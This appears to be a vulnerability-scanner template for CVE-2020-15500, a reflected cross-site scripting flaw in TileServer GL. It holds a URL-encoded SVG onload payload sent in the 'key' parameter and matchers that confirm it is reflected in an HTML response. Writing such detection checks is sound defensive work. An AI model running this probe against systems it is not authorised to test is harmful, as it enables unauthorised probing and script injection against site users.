id: CVE-2020-15500

info:
  name: TileServer GL Reflected XSS
  author: Akash.C
  severity: medium
  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500
  source: https://github.com/maptiler/tileserver-gl/issues/461
  tags: cve,cve2020,xss,tileserver

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        words:
          - "'>\"<svg/onload=confirm('xss')>"
        part: body